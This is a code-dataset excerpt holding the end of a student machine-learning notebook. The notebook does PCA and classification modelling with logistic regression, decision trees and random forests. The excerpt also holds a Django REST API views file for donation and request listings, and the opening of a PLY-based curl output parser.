In[169]:\n\n\nX_train_pca_std.shape\n\n\n# In[170]:\n\n\n# Tranforming X_Test\nX_test_pca_std = pca_again.transform(X_test)\nX_test_pca_std.shape\n\n\n# In[171]:\n\n\n#Doing the PCA on the train data\npca.fit(X_train)\n\n\n# In[172]:\n\n\n#Making the screeplot - plotting the cumulative variance against the number of components\nget_ipython().run_line_magic('matplotlib', 'inline')\nfig = plt.figure(figsize = (12,8))\nplt.vlines(x = X_train_pca_std.shape[1],ymax = 1,ymin = 0,colors = 'r',linestyles = '--')\nplt.hlines(y = 0.95, xmax = 70,xmin = 0,colors = 'g',linestyles = '--')\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.xlabel('number of components')\nplt.ylabel('cumulative explained variance')\n\nsns.despine()\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# In[173]:\n\n\npca = PCA(n_components=5)\n\n\n# In[174]:\n\n\nscaler = StandardScaler()\n\n\n# In[175]:\n\n\nscaled_df=df_winow2.copy()\nscaled_df=pd.DataFrame(scaler.fit_transform(scaled_df), columns=scaled_df.columns)\npca_fit = pca.fit(scaled_df)\n\n\n# In[ ]:\n\n\n\n\n\n# In[176]:\n\n\nfig = plt.figure(figsize=(14,5))\nPC_values = np.arange(pca_fit.n_components_) + 1\n\nplt.plot(PC_values, pca_fit.explained_variance_ratio_, 'o-', linewidth=2, color='blue')\nplt.title('Scree Plot')\nplt.xlabel('Principal Component')\nplt.ylabel('Variance Explained')\n\nplt.show()\n\n\n# In[177]:\n\n\nprint(pca_fit.explained_variance_ratio_)\n\n\n# In[ ]:\n\n\n\n\n\n# # Data Preparation for Modelling\n\n# In[178]:\n\n\nX = df_winow2.drop('Class', axis = 1)\ny = df_winow2[['Class']]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 100, stratify=y)\n\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\n\n# In[179]:\n\n\n# Normalize the data \n\nscaler = MinMaxScaler()\n\nscaled_data = scaler.fit_transform(X_train)\n\nX_train = pd.DataFrame(data = scaled_data, index = X_train.index, columns = X_train.columns)\nX_test = pd.DataFrame(data = scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n\n\n# In[ ]:\n\n\n\n\n\n# In[180]:\n\n\nprint(\"Before OverSampling, counts of label '1': {}\".format((y_train==1).sum()[0]))\nprint(\"Before OverSampling, counts of label '0': {} \\n\".format((y_train==0).sum()[0]))\n\ny_train_1 = (y_train==1).sum()[0]\nprint(\"Before OverSampling, churn event rate : {}% \\n\".format(round(y_train_1/len(y_train)*100,2)))\n\n\n# In[181]:\n\n\nsm_smot = smot(random_state=27, sampling_strategy=1)\nX_train_res, y_train_res = sm_smot.fit_resample(X_train, y_train)\nX_train_res = X_train\ny_train_res = y_train\n\n\n# # Defining functions for Modelling\n\n# In[182]:\n\n\n# Defining the function to plot the ROC Curve\n\ndef draw_roc (actual, probs):\n fpr, tpr, thresholds = metrics.roc_curve(actual, probs, drop_intermediate = False)\n \n auc_score = metrics.roc_auc_score(actual, probs)\n plt.figure(figsize=(7,5))\n plt.plot(fpr, tpr, label=\"ROC curve (area = %0.2f)\"%auc_score)\n \n plt.plot([0,1],[0,1],'k--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel(\"False Positive Rate or [1 - True Negative Rate]\")\n plt.ylabel(\"True Positive Rate\")\n plt.title(\"Receiver operating charactersitc example\")\n plt.legend(loc=\"lower right\")\n sns.despine()\n plt.tight_layout()\n plt.show()\n \n return fpr, tpr, thresholds\n\n\n# In[183]:\n\n\nmetricsdataframe=pd.DataFrame(columns=['Model',\n 'Train/Test',\n 'Roc_auc_score',\n 'Sensitivity',\n 'Specificity',\n 'FPR',\n 'Positive predictive value',\n 'Negative Predictive value',\n 'Precision',\n 'Accuracy',\n 'F1-Score'])\n\n\n# In[184]:\n\n\n# Defining function to get the evaluation metrics of the models.\ndef getModelMetrics(actual_Class=False,pred_Class=False,model_name='',train_or_test=''):\n\n confusion = metrics.confusion_matrix(actual_Class, pred_Class)\n\n TP = confusion[1,1] # true positive \n TN = confusion[0,0] # true negatives\n FP = confusion[0,1] # false positives\n FN = confusion[1,0] # false negatives\n \n\n \n Roc_auc_score=round(metrics.roc_auc_score(actual_Class,pred_Class),2)\n # Let's see the sensitivity of our logistic regression model\n Sensitivity=round((TP / float(TP+FN)),2)\n # Let us calculate specificity\n Specificity=round((TN / float(TN+FP)),2)\n # Calculate false postive rate - predicting profit when customer does not have profitted\n FPR=round((FP/ float(TN+FP)),2)\n # positive predictive value \n PositivePredictiveValue=round((TP / float(TP+FP)),2)\n # Negative predictive value\n NegativePredictiveValue=round((TN / float(TN+ FN)),2)\n # sklearn precision score value \n Precision=round(metrics.precision_score(actual_Class, pred_Class ),2)\n # Accuracy\n Accuracy = round(metrics.accuracy_score(actual_Class, pred_Class), 2)\n # F-1 Score\n F1_Score = round(metrics.f1_score(actual_Class, pred_Class), 2)\n \n \n print(\"Roc_auc_score : {}\".format(metrics.roc_auc_score(actual_Class,pred_Class)))\n # Let's see the sensitivity of our logistic regression model\n print('Sensitivity/Recall : {}'.format(TP / float(TP+FN)))\n # Let us calculate specificity\n print('Specificity: {}'.format(TN / float(TN+FP)))\n # Calculate false postive rate - predicting profit when customer does not have profitted\n print('False Positive Rate: {}'.format(FP/ float(TN+FP)))\n # positive predictive value \n print('Positive predictive value: {}'.format(TP / float(TP+FP)))\n # Negative predictive value\n print('Negative Predictive value: {}'.format(TN / float(TN+ FN)))\n # sklearn precision score value \n print('Precision: {}'.format(metrics.precision_score(actual_Class, pred_Class )))\n # sklearn precision score value \n print('Accuracy: {}'.format(metrics.accuracy_score(actual_Class, pred_Class )))\n #F1 Score\n print(\"F1 Score: {}\".format(metrics.f1_score(actual_Class, pred_Class )))\n \n# data_list=[model_name,train_or_test,Roc_auc_score,Sensitivity,Specificity,NegativePredictiveValue,Precision, ]\n data_list=[model_name,train_or_test,Roc_auc_score,Sensitivity,Specificity,FPR,PositivePredictiveValue,NegativePredictiveValue,Precision, Accuracy, F1_Score]\n series_metrics=pd.Series(data_list,index=metricsdataframe.columns)\n \n return series_metrics\n \n\n\n# In[185]:\n\n\n# Defining function to write the evaluation metrics of the models into data frame.\ndef WriteModelMetrics(series_metrics,metricsdataframe):\n metricsdataframe = metricsdataframe.append(series_metrics,ignore_index=True)\n return metricsdataframe\n\n\n# In[186]:\n\n\n# Function to find the optimal cutoff for classifing as Profit/non-profit\ndef findOptimalCutoff(df):\n \n # Let's create columns with different probability cutoffs \n numbers = [float(x)/10 for x in range(10)]\n for i in numbers:\n df[i] = df.Class_Prob.map( lambda x: 1 if x > i else 0)\n \n \n # Now let's calculate accuracy sensitivity and specificity for various probability cutoffs.\n cutoff_df = pd.DataFrame( columns = ['prob','accuracy','sensi','speci'])\n from sklearn.metrics import confusion_matrix\n \n num = [0.0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n\n for i in num:\n cm1 = metrics.confusion_matrix(df.Class, df[i] )\n total1=sum(sum(cm1))\n accuracy = (cm1[0,0]+cm1[1,1])/total1\n \n speci = cm1[0,0]/(cm1[0,0]+cm1[0,1])\n sensi = cm1[1,1]/(cm1[1,0]+cm1[1,1])\n cutoff_df.loc[i] =[ i ,accuracy,sensi,speci]\n print(cutoff_df)\n \n # Let's plot accuracy sensitivity and specificity for various probabilities.\n cutoff_df.plot.line(x='prob', y=['accuracy','sensi','speci'])\n plt.figure(figsize=(7,5))\n plt.tight_layout()\n sns.despine()\n plt.show()\n\n\n# In[187]:\n\n\n# Calculating VIF \nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n# Defining a function to give VIF value \ndef vif_cal(X): \n vif = pd.DataFrame() \n vif['Features'] = X.columns\n vif['VIF'] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])] \n vif['VIF'] = round(vif['VIF'], 2)\n vif = vif.sort_values(by=\"VIF\", ascending=False)\n return vif\n\n\n# In[188]:\n\n\n# This method will result in the calculation of predicted value of the Class column.\ndef predictClassWithProb(model,X,y,prob,model_name='',train_or_test=''):\n \n # predict\n pred_probs = model.predict_proba(X)[:,1]\n \n y_df= pd.DataFrame({'Class':y.Class, 'Class_Prob':pred_probs})\n # Creating new column 'predicted' with 1 if Class_Prob>0.5 else 0\n y_df['final_predicted'] = y_df.Class_Prob.map( lambda x: 1 if x > prob else 0)\n # Let's see the head\n series_metrics=getModelMetrics(y_df.Class,y_df.final_predicted,model_name,train_or_test)\n return y_df,series_metrics\n\n\n# In[189]:\n\n\n# This method will perform cross-validation and the display the model report.\ndef modelfit(alg, X_train, y_train, performCV=True, cv_folds=my_cv):\n #Fit the algorithm on the data\n alg.fit(X_train, y_train)\n \n #Predict training set:\n dtrain_predictions = alg.predict(X_train)\n dtrain_predprob = alg.predict_proba(X_train)[:,1]\n \n #Perform cross-validation:\n if performCV:\n cv_score = cross_val_score(alg, X_train, y_train, cv=cv_folds, scoring='accuracy')\n \n #Print model report:\n print (\"\\nModel Report\")\n print (\"Accuracy : %.3g\" % metrics.roc_auc_score(y_train, dtrain_predictions))\n print (\"Recall/Sensitivity : %.3g\" % metrics.recall_score(y_train, dtrain_predictions))\n print (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_train, dtrain_predprob))\n \n if performCV:\n print (\"CV Score : Mean - %.3g | Std - %.3g | Min - %.3g | Max - %.3g\" % (np.mean(cv_score),np.std(cv_score),np.min(cv_score),np.max(cv_score)))\n \n\n\n# In[190]:\n\n\n# This method will plot accuracy of the model with the given param of model.\ndef plot_traintestAcc(score,param):\n scores = score\n # plotting accuracies with max_depth\n plt.figure()\n plt.plot(scores[\"param_\"+param], \n scores[\"mean_train_score\"], \n label=\"training accuracy\")\n plt.plot(scores[\"param_\"+param], \n scores[\"mean_test_score\"], \n label=\"test accuracy\")\n plt.xlabel(param)\n plt.ylabel(\"accuracy\")\n plt.legend()\n plt.show()\n\n\n# In[191]:\n\n\n# This method will plot accuracy of the random forest model.\ndef random_forst_feature_graph(grid_search, param):\n scores = grid_search.cv_results_\n plt.figure(figsize=(8,8))\n \n param = \"param_\"+param\n plt.plot(scores[param], \n scores[\"mean_train_score\"], \n label=\"Training accuracy\")\n\n plt.plot(scores[param], \n scores[\"mean_test_score\"], \n label=\"Test accuracy\")\n\n plt.xlabel(param)\n plt.ylabel(\"F1\")\n plt.legend()\n\n plt.tight_layout()\n sns.despine()\n plt.show()\n\n\n# # Modelling\n\n# In[192]:\n\n\nX_train = X_train_pca_mm\nX_test = X_test_pca_mm\n\n\n# In[193]:\n\n\nX_train_pca = X_train\ny_train_res = y_train\nX_test_pca = X_test\n# y_test = y_test\n\ny_train_res=y_train_res.values.reshape(-1,1)\n# y_test = y_test.values.reshape(-1,1)\n\n\n# In[194]:\n\n\nX_train_pca.shape\n\n\n# In[195]:\n\n\ny_train_res.shape\n\n\n# In[196]:\n\n\nX_test_pca.shape\n\n\n# In[197]:\n\n\ny_test.shape\n\n\n# In[198]:\n\n\ny_train_res = pd.DataFrame(y_train_res)\n\n\n# In[199]:\n\n\ny_train_res.rename(columns={0:\"Class\"}, inplace=True)\n\n\n# In[200]:\n\n\ny_train_res\n\n\n# In[201]:\n\n\ny_test \n\n\n# # 1. Logistic Regression\n\n# In[202]:\n\n\n# Creating Train-Test variables for Logistic Regression\nX_train_lr = pd.DataFrame(X_train_pca)\ny_train_lr = pd.DataFrame(y_train_res)\nX_test_lr = pd.DataFrame(X_test_pca)\ny_test_lr = y_test\n\n\n# In[203]:\n\n\nlogml = sm.GLM(y_train_lr, (sm.add_constant(X_train_lr)), family = sm.families.Binomial())\nlogml.fit().summary()\n\n\n# In[204]:\n\n\n# Checking for the VIF of the train data.\nvif = vif_cal(X_train_lr) \nvif\n\n\n# ### Observation\n# - There are no Columns which are highly correlated ---> VIF = 1\n# - There are not many columns whose coefficients are not statistically significant ----> p>0.05\n\n# In[205]:\n\n\nlg = LogisticRegression()\n\n\n# In[206]:\n\n\nmodelfit(lg, X_train_lr, y_train_lr)\n\n\n# In[207]:\n\n\n# predictions on Test data\npred_probs_test = lg.predict(X_test_lr)\ngetModelMetrics(y_test_lr,pred_probs_test)\n\n\n# In[208]:\n\n\nprint(\"Accuracy : {}\".format(metrics.accuracy_score(y_test_lr,pred_probs_test)))\nprint(\"Recall : {}\".format(metrics.recall_score(y_test_lr,pred_probs_test)))\nprint(\"Precision : {}\".format(metrics.precision_score(y_test_lr,pred_probs_test)))\n\n\n# In[209]:\n\n\nprint(metrics.confusion_matrix(y_test_lr,pred_probs_test))\n\n\n# In[210]:\n\n\n#Making prediction on the test data\npred_probs_train = lg.predict_proba(X_train_lr)[:,1]\n\nprint(\"roc_auc_score(Train) {:2.2}\".format(metrics.roc_auc_score(y_train_lr, pred_probs_train)))\n\n\n# In[211]:\n\n\ny_train_lr.rename(columns={0:\"Class\"}, inplace=True)\n\ncut_off_prob=0.5\ny_train_df,series_metrics = predictClassWithProb(lg,X_train_lr,y_train_lr,cut_off_prob)\n\n\n# In[212]:\n\n\ndraw_roc(y_train_df.Class, y_train_df.final_predicted)\nprint(\"roc_auc_score : {:2.2f}\".format(metrics.roc_auc_score(y_train_df.Class, y_train_df.final_predicted)))\n\n\n# In[213]:\n\n\n#draw_roc(y_pred_final.Churn, y_pred_final.predicted)\nprint(\"roc_auc_score : {:2.2f}\".format(metrics.roc_auc_score(y_train_df.Class, y_train_df.final_predicted)))\n\n\n# In[214]:\n\n\n# finding cut-off with the right balance of the metrices\n# sensitivity vs specificity trade-off\nfindOptimalCutoff(y_train_df)\n\n\n# In[215]:\n\n\n# predicting with the choosen cut-off on TRAIN\ncut_off_prob = 0.5\ny_train_df,series_metrics = predictClassWithProb(lg,X_train_lr,y_train_lr,cut_off_prob,model_name='Logistic Regression',train_or_test='TRAIN')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# In[216]:\n\n\n### predicting with the choosen cut-off on TEST\ncut_off_prob=0.5\ny_train_df,series_metrics = predictClassWithProb(lg,X_test_lr,y_test_lr,cut_off_prob,model_name='Logistic Regression',train_or_test='TEST')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# #### \n\n# ## 2. Decision Tree\n\n# In[217]:\n\n\n# Creating Train-Test variables for Decision Tree\nX_train_dt = pd.DataFrame(X_train_pca)\ny_train_dt = pd.DataFrame(y_train_res)\nX_test_dt = pd.DataFrame(X_test_pca)\ny_test_dt = y_test\n\n\n# In[218]:\n\n\nX_train_dt.shape\n\n\n# In[219]:\n\n\ny_train_dt.shape\n\n\n# In[220]:\n\n\nX_test_dt.shape, y_test_dt.shape\n\n\n# In[221]:\n\n\n##### Applying Decision Tree Classifier on our principal components with Hyperparameter tuning\ndt = DecisionTreeClassifier(class_weight='balanced',\n max_features='auto',\n min_samples_split=100,\n min_samples_leaf=100,\n max_depth=10,\n random_state=123)\n\nmodelfit(dt, X_train_dt, y_train_dt)\n\n\n# In[222]:\n\n\n# make predictions\npred_probs_test = dt.predict(X_test_dt)\n\n#Let's check the model metrices.\n\ngetModelMetrics(y_test_dt,pred_probs_test)\n\n\n# In[223]:\n\n\n# Create the parameter grid based on the results of random search \nparam_grid = {\n 'max_depth': [5,10,15,20,30,50],\n 'min_samples_leaf': range(100, 500, 50),\n 'min_samples_split': range(100, 500, 50),\n 'max_features': [5,10,15,20,30,50]\n}\n# Create a base model\ndt = DecisionTreeClassifier(class_weight='balanced',random_state=123)\n\n# Instantiate the grid search model\ngrid_search = GridSearchCV(estimator = dt, param_grid = param_grid, cv = my_cv, n_jobs = -1,verbose = 1000,scoring=\"f1_weighted\")\n\n\n# In[224]:\n\n\n# Fit the grid search to the data\ngrid_search.fit(X_train_dt, y_train_dt)\n\n\n# In[225]:\n\n\n# printing the optimal accuracy score and hyperparameters\nprint('We can get score of',grid_search.best_score_,'using',grid_search.best_params_)\n\n\n# In[226]:\n\n\ncv_df = pd.DataFrame(grid_search.cv_results_)\ncv_df.head(3)\n\n\n# In[227]:\n\n\ncv_df.nlargest(3,\"mean_test_score\")\n\n\n# In[228]:\n\n\ngrid_search.best_score_\n\n\n# In[229]:\n\n\ngrid_search.best_estimator_\n\n\n# In[230]:\n\n\nparam_max_depth = cv_df.nlargest(3,\"mean_test_score\").param_max_depth.iloc[0]\nparam_max_features = cv_df.nlargest(3,\"mean_test_score\").param_max_features.iloc[0]\nparam_min_samples_leaf = cv_df.nlargest(3,\"mean_test_score\").param_min_samples_leaf.iloc[0]\nparam_min_samples_split = cv_df.nlargest(3,\"mean_test_score\").param_min_samples_split.iloc[0]\n\n\n# In[231]:\n\n\n# model with the best hyperparameters\ndt_final = DecisionTreeClassifier(class_weight='balanced',\n max_depth=param_max_depth,\n max_features=param_max_features,\n min_samples_leaf=param_min_samples_leaf, \n min_samples_split=param_min_samples_split,\n random_state=123)\n\n\n# In[232]:\n\n\nmodelfit(dt_final,X_train_dt,y_train_dt)\n\n\n# In[233]:\n\n\ndraw_roc(y_train_df.Class, y_train_df.final_predicted)\nprint(\"roc_auc_score : {:2.2f}\".format(metrics.roc_auc_score(y_train_df.Class, y_train_df.final_predicted)))\n\n\n# In[234]:\n\n\n# make predictions\npred_probs_test = dt_final.predict(X_test_dt)\n#Let's check the model metrices.\ngetModelMetrics(actual_Class=y_test_dt,pred_Class=pred_probs_test)\n\n\n# In[235]:\n\n\n# predicting churn with default cut-off 0.5\ncut_off_prob = 0.5\ny_train_df,series_metrics = predictClassWithProb(dt_final,X_train_dt,y_train_dt,cut_off_prob)\n\n\n# In[236]:\n\n\n# finding cut-off with the right balance of the metrices\nfindOptimalCutoff(y_train_df)\n\n\n# In[237]:\n\n\n# predicting churn with cut-off 0.4\ncut_off_prob=0.36\ny_train_df,series_metrics = predictClassWithProb(dt_final,X_train_dt,y_train_dt,cut_off_prob,model_name='Decision Tree',train_or_test='TRAIN')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# In[238]:\n\n\n#Lets see how it performs on test data.\ny_test_df,series_metrics= predictClassWithProb(dt_final,X_test_dt,y_test_dt,cut_off_prob,model_name='Decision Tree',train_or_test='TEST')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# # 3. Random Forest\n\n# In[239]:\n\n\n# Creating Train-Test variables for Random Forest\nX_train_rf = pd.DataFrame(X_train_pca)\ny_train_rf = pd.DataFrame(y_train_res)\nX_test_rf = pd.DataFrame(X_test_pca)\ny_test_rf = y_test\n\n\n# In[240]:\n\n\nrf = RandomForestClassifier(random_state=42, max_depth=5, n_estimators=20, oob_score=True)\n\n\n# In[241]:\n\n\nrf.fit(X_train_rf, y_train_rf)\n\n\n# In[242]:\n\n\nrf.oob_score_\n\n\n# In[243]:\n\n\n# make predictions\npred_probs_test = rf.predict(X_test_rf)\n\n#Let's check the model metrices.\ngetModelMetrics(actual_Class=y_test_rf,pred_Class=pred_probs_test)\n\n\n# In[244]:\n\n\nparameters = {'max_depth': range(5, 40, 5)}\nrf = RandomForestClassifier()\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[245]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[246]:\n\n\n# grid_search.cv_results_\n\nplot_traintestAcc(grid_search.cv_results_,'max_depth')\n\n\n# In[247]:\n\n\nmy_max_depth = pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_max_depth'].iloc[0]\n\n\n# ### Tuning n_estimators\n\n# In[248]:\n\n\nparameters = {'n_estimators': range(5, 70, 5)}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=100, return_train_score=True)\n\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[249]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\").head()\n\n\n# In[250]:\n\n\nrandom_forst_feature_graph(grid_search, \"n_estimators\")\n\n\n# In[251]:\n\n\nmy_n_estimator = pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_n_estimators'].iloc[0]\n\n\n# ### Tuning max_features\n\n# In[252]:\n\n\nparameters = {'max_features': [5, 10, 15, 20, 25, 30,50,70]}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,n_estimators = my_n_estimator,random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[253]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[254]:\n\n\nrandom_forst_feature_graph(grid_search, \"max_features\")\n\n\n# In[255]:\n\n\nmy_max_features=pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_max_features'].iloc[0]\n\n\n# ### Tuning min_samples_leaf\n\n# In[256]:\n\n\nparameters = {'min_samples_leaf': range(1, 500, 50)}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,n_estimators = my_n_estimator, max_features = my_max_features, random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[257]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[258]:\n\n\nrandom_forst_feature_graph(grid_search, \"min_samples_leaf\")\n\n\n# In[259]:\n\n\nmy_min_sample_leaf = pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_min_samples_leaf'].iloc[0]\n\n\n# ### Tuning min_samples_split\n\n# In[260]:\n\n\nparameters = {'min_samples_split': range(50, 550, 50)}\n\nrf = RandomForestClassifier(max_depth=my_max_depth,n_estimators = my_n_estimator, max_features = my_max_features, min_samples_leaf = my_min_sample_leaf,random_state=10)\ngrid_search = GridSearchCV(rf, parameters, cv=my_cv, scoring=\"f1_weighted\", verbose=1000, return_train_score=True)\n\n\ngrid_search.fit(X_train_rf, y_train_rf)\n\n\n# In[261]:\n\n\npd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")\n\n\n# In[262]:\n\n\nrandom_forst_feature_graph(grid_search, \"min_samples_split\")\n\n\n# In[263]:\n\n\nmy_min_samples_split=pd.DataFrame(grid_search.cv_results_).sort_values(by=\"rank_test_score\")['param_min_samples_split'].iloc[0]\n\n\n# ### Final Model\n\n# In[264]:\n\n\nrf_final = RandomForestClassifier(max_depth=my_max_depth,\n n_estimators = my_n_estimator, \n max_features = my_max_features, \n min_samples_leaf = my_min_sample_leaf,\n min_samples_split=my_min_samples_split,\n random_state=123)\n\n\n# In[265]:\n\n\nprint(\"Model performance on Train data:\")\nmodelfit(rf_final,X_train_rf,y_train_rf)\n\n\n# In[266]:\n\n\n# predict on test data\npredictions = rf_final.predict(X_test_rf)\n\n\n# In[267]:\n\n\nprint(\"Model performance on Test data:\")\ngetModelMetrics(y_test_rf,predictions)\n\n\n# In[268]:\n\n\n# predicting churn with default cut-off 0.5\ncut_off_prob=0.5\ny_train_df,series_metrics = predictClassWithProb(rf_final,X_train_rf,y_train_rf,cut_off_prob)\n\n\n# In[269]:\n\n\n# finding cut-off with the right balance of the metrices\nfindOptimalCutoff(y_train_df)\n\n\n# In[270]:\n\n\n## Training Data \ncut_off_prob=0.25\n\ny_train_df,series_metrics=predictClassWithProb(rf_final,X_train_rf,y_train_rf,cut_off_prob,model_name='Random Forest',train_or_test='TRAIN')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\ny_train_df.head()\n\n\n# In[271]:\n\n\n# Testing Data\ny_test_df,series_metrics= predictClassWithProb(rf_final,X_test_rf,y_test_rf,cut_off_prob,model_name='Random Forest',train_or_test='TEST')\nmetricsdataframe=WriteModelMetrics(series_metrics,metricsdataframe)\n\n\n# # Conclusion\n# \n# - We are getting Low Accuracy (in late 50s) and low precision (in late 50s) which is too poor to be acceptable\n\n# In[ ]:\n\n\n\n\n","repo_name":"yashmishra12/ALDA_Project","sub_path":"Python_files/Winsorize_SMOT.py","file_name":"Winsorize_SMOT.py","file_ext":"py","file_size_in_byte":44284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27885724581","text":"from datetime import datetime\nfrom django.utils import timezone\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\n\nfrom identity.models import Organization\nfrom listing.models import Donation, Request\nfrom listing.serializers import DonationSerializer, RequestSerializer\n\nclass DonationView(APIView):\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None, **kwargs):\n org_id = request.query_params.get('org_id', None)\n donation_status = request.query_params.get('status', None)\n all_donations = Donation.objects.all()\n donations_filtered = all_donations\n if org_id is not None:\n try:\n org = Organization.objects.get(id=org_id)\n except (Organization.DoesNotExist, ValueError):\n return Response(\n {\"message\": \"Invalid org_id parameter value\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n donations_filtered = all_donations.filter(organization=org)\n\n if donation_status is not None:\n # validate if the status is in \"active\" or \"inactive\"\n if donation_status not in [\"active\", \"inactive\"]:\n return Response(\n {\"message\": \"Invalid status parameter value\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n if donation_status == \"active\":\n donations_filtered = donations_filtered.exclude(deactivation_time__lte=datetime.now(tz=timezone.utc))\n elif donation_status == \"inactive\":\n donations_filtered = donations_filtered.filter(deactivation_time__lte=datetime.now(tz=timezone.utc))\n\n # if query set emtpy \n if not donations_filtered:\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n serializer = DonationSerializer(donations_filtered, many=True)\n return Response(\n {\"donations\": serializer.data},\n status=status.HTTP_200_OK\n )\n \n def post(self, request, format=None):\n serializer = DonationSerializer(data=request.data)\n if serializer.is_valid():\n created_donation = serializer.save()\n return Response({\"donation_id\": created_donation.donation_id}, status=status.HTTP_201_CREATED)\n errors = serializer.errors\n key = list(errors.keys())[0]\n return Response(\n {\"message\": \"for key \" + key + \" \"+ str(errors[key])},\n status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, format=None):\n donation_id = request.data.get('donation_id', None)\n if donation_id is not None:\n try:\n donation = Donation.objects.get(donation_id=donation_id)\n except (Donation.DoesNotExist, ValueError):\n return Response(\n {\"message\": \"Invalid org_id parameter value\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n serializer = DonationSerializer(donation)\n # soft_delete will be triggered in save()\n serializer.save()\n return Response(status=status.HTTP_200_OK)\n return Response(\n {\"message\": \"Invalid request\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n\nclass RequestView(APIView):\n permission_classes = (IsAuthenticated,)\n def get(self, request, format=None, **kwargs):\n org_id = request.query_params.get('org_id', None)\n request_status = request.query_params.get('status', None)\n all_requests = Request.objects.all()\n requests_filtered = all_requests\n if org_id is not None:\n try:\n org = Organization.objects.get(id=org_id)\n except (Organization.DoesNotExist, ValueError):\n return Response(\n {\"message\": \"Invalid org_id parameter value\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n requests_filtered = all_requests.filter(organization=org)\n\n if request_status is not None:\n # validate if the status is in \"active\" or \"inactive\"\n if request_status not in [\"active\", \"inactive\"]:\n return Response(\n {\"message\": \"Invalid status parameter value\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n if request_status == \"active\":\n requests_filtered = requests_filtered.exclude(deactivation_time__lte=datetime.now(tz=timezone.utc))\n elif request_status == \"inactive\":\n requests_filtered = requests_filtered.filter(deactivation_time__lte=datetime.now(tz=timezone.utc))\n\n # if query set emtpy \n if not requests_filtered:\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n serializer = RequestSerializer(requests_filtered, many=True)\n return Response(\n {\"requests\": serializer.data},\n status=status.HTTP_200_OK\n )\n def post(self, request, format=None):\n serializer = RequestSerializer(data=request.data)\n if serializer.is_valid():\n created_request = serializer.save()\n return Response(\n {\"request_id\": created_request.request_id},\n status=status.HTTP_201_CREATED)\n errors = serializer.errors\n key = list(errors.keys())[0]\n return Response(\n {\"message\": \"for key \" + key + \" \"+ str(errors[key])},\n status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, format=None):\n request_id = request.data.get('request_id', None)\n if request_id is not None:\n try:\n request = Request.objects.get(request_id=request_id)\n except (Request.DoesNotExist, ValueError):\n return Response(\n {\"message\": \"Invalid org_id parameter value\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n serializer = RequestSerializer(request)\n # soft_delete will be triggered in save()\n serializer.save()\n return Response(status=status.HTTP_200_OK)\n return Response(\n {\"message\": \"Invalid request\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n","repo_name":"feed-our-communities/atfoc-backend","sub_path":"listing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29063699625","text":"import types\n\nimport ply.yacc as yacc\n\nfrom lexer import CurlOutputLexer\n\n\nclass Event(object):\n __slots__ = ('datetime', 'event', 'data')\n\n def __init__(self, datetime_obj, event, data=None):\n self.datetime = datetime_obj\n self.event = event\n self.data = data\n\n def __unicode__(self):\n if self.data is not None:\n if isinstance(self.data, types.ListType):\n if len(self.data) > 3:\n data_repr = self.data[:3] + 